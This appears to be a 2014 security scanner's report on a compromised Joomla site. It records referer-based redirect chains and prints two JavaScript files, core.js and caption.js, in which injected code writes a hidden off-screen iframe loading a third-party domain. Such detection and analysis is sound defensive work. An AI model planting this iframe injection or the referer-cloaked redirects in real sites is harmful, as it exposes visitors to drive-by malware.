Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://techclining.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: techclining.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache Connection: close Date: Thu, 25 Sep 2014 10:30:24 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: nginx/1.4.4 Content-Type: text/html; charset=utf-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1411641024; expires=Fri, 26-Sep-2014 10:30:24 GMT; path=/ Set-Cookie: 84fad698d4dccdb50aec86bedd4f8de7=0fu5d90l5kj9cctr9t1i16lu25; path=/ X-Powered-By: PHP/5.3.27-pl0-gentoo | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Thu, 25 Sep 2014 10:30:25 GMT Pragma: no-cache Location: http://amantecrystal.com/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Thu, 25 Sep 2014 10:30:25 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://techclining.ru/ | 200 OK Content-Length: 17480 Content-Type: text/html | clean |
http://techclining.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96554 Content-Type: application/x-javascript | clean |
http://techclining.ru/media/system/js/core.js | 200 OK Content-Length: 4976 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). In the excerpt, the Joomla code of core.js is followed by a run of semicolons and a `document.write` call that injects a 20x20 iframe positioned off-screen (left:-1000px), loading a page from a third-party domain:
if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ ;;;;;;;;;;;;;;;;;;;;;;;;;document.write('<iframe height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://tantalizingthrowing.ru/1ZA0t.Wd8xXxB05q6?default"></iframe>');
Antivirus reports: (no antivirus results are present in this copy of the report)
http://techclining.ru/media/system/js/caption.js | 200 OK Content-Length: 921 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The JCaption class is followed by a run of semicolons and the same off-screen iframe `document.write` call that appears in core.js:
var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!= ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;;;;;;;;;;;;;;;;;;;;;;;;document.write('<iframe height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://tantalizingthrowing.ru/1ZA0t.Wd8xXxB05q6?default"></iframe>');
Antivirus reports: (no antivirus results are present in this copy of the report)
http://techclining.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 303 See other Connection: close Date: Thu, 25 Sep 2014 10:30:31 GMT Location: http://techclining.ru//mc.yandex.ru/metrika/watch.js/ Server: nginx/1.4.4 Content-Length: 235 Content-Type: text/html; charset=utf-8 Set-Cookie: 84fad698d4dccdb50aec86bedd4f8de7=8bbncoj9h7jslf45fifaefgs17; path=/ X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://techclining.ru/test404page.js | 404 Not Found Content-Length: 1108 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2153041 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=techclining.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://techclining.ru/
Result: techclining.ru is not infected or malware details are not published yet.